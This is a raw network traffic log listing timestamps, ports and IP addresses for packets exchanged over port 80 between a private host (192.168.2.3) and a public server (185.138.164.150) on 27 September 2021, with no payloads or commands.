Sep 27, 2021 23:55:32.569756985 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.600178003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.600224018 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.600246906 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.600270987 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.600337029 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.600399971 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.600421906 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.600466013 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.600491047 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.604691029 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.604754925 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.604777098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.604779005 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.604842901 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.604923010 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.604943037 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.604963064 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.605031013 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.605110884 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.605192900 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.635303974 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.635332108 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.635346889 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.635443926 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.635462999 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.635478973 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.635535002 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.635617018 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.640265942 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.640289068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.640305042 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.640325069 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.640341043 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.640358925 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.640377045 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.640417099 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.640497923 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.640516043 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.640649080 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.670398951 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.671148062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.671250105 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.671497107 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.671525955 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.671564102 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.671571016 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.671658039 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.675580025 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.675615072 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.675816059 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.678052902 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.678241014 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.678448915 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.678508997 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.678539038 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.678626060 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.678638935 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.678652048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.678767920 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.706089020 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.706130981 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.706156015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.706178904 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.706202030 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.706262112 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.706305027 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.706347942 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.706351995 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.710417032 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.710448980 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.710587978 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.713171005 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.713217020 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.713232994 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.713319063 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.713337898 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.713368893 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.713519096 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.713721037 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.713754892 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.713798046 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.741466045 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.741473913 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.741487026 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.741520882 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.741553068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.741579056 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.741619110 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.745722055 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.745762110 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.746057034 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.748554945 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.748593092 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.748620033 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.748642921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.748661995 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.748667002 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.748711109 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.748780966 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.748842001 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.776922941 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.776964903 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.776988983 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.777009964 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.777034044 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.777055979 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.777079105 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.777101040 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.777775049 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.780932903 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.780972958 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.781050920 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.783718109 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.783796072 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.783814907 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.783834934 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.783854961 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.783886909 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.783914089 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.783941984 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.783993006 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.812338114 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.812371016 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.812448025 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.812479019 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.812496901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.812504053 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.812529087 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.812563896 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.812581062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.812592983 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.812668085 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.812720060 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.815665007 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.815709114 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.815963984 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.818289995 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.818317890 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.818370104 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.818418026 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.818445921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.818456888 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.818526983 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.818562031 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.818586111 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.818614960 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.847232103 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.847261906 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.847279072 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.847301006 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.847312927 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.847323895 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.847342014 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.847405910 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.847450972 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.850543022 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.850577116 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.850673914 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.852832079 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.852874041 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.852900028 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.852925062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.852945089 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.852994919 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.853018045 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.853033066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.853085995 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.882051945 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.882097006 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.882119894 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.882139921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.882163048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.882184029 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.882205009 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.882206917 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.882291079 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.882353067 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.882425070 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.885370970 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.885415077 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.885531902 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.887784004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.887823105 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.887845039 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.887928963 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.887937069 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.887979031 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.887999058 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.888001919 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.888058901 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.888117075 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.918261051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.918301105 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.918328047 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.918349981 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.918386936 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.918395996 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.918411016 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.918437004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.918462038 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.918467045 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.918503046 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.920537949 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.920573950 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.920727968 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.922364950 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.922418118 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.922456980 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.922457933 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.922489882 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.922492027 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.922517061 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.922540903 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.922553062 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.922584057 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.922660112 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.922719002 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.954770088 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.954813004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.955053091 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.955108881 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.955157995 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.955183983 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.955224991 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.955264091 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.955317974 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.956125975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.958017111 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.958039999 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.958056927 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.958183050 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.989649057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.989691973 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.989717007 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.989739895 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.989830971 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.989885092 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.990983009 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.991018057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.991041899 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.991077900 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.991106033 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.991153002 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.994853020 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.994894028 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.994962931 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.994991064 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:32.995038986 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:32.996663094 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.025070906 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.025114059 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.025139093 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.025161982 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.025276899 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.026405096 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.026547909 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.026628017 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.027066946 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.027275085 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.027350903 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.030445099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.030489922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.030652046 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.032222033 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.032253027 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.032264948 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.032438993 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.060846090 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.060852051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.060869932 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.060894012 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.061045885 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.061491013 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.061513901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.061589956 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.062396049 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.062514067 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.062514067 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.065928936 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.065967083 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.066021919 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.067950010 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.068025112 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.068051100 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.068053007 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.068124056 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.096472025 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.096992016 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.097016096 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.097033024 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.097048044 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.097064972 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.097408056 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.097820044 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.101473093 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.101557970 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.101720095 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.102483034 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.102519989 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.102540970 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.102566957 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.102581024 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.102627039 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.132133007 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.132179976 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.132200003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.132224083 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.132247925 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.132292986 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.132457972 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.132488966 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.137768984 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.137814045 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.137835979 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.137857914 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.139245987 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.139290094 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.139319897 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.139338970 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.140296936 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.140340090 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.167583942 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.167620897 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.167645931 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.167666912 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.167793036 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.169101000 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.169141054 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.169436932 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.175679922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.175724030 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.175750971 CEST	80	49745	185.138.164.150	192.168.2.3
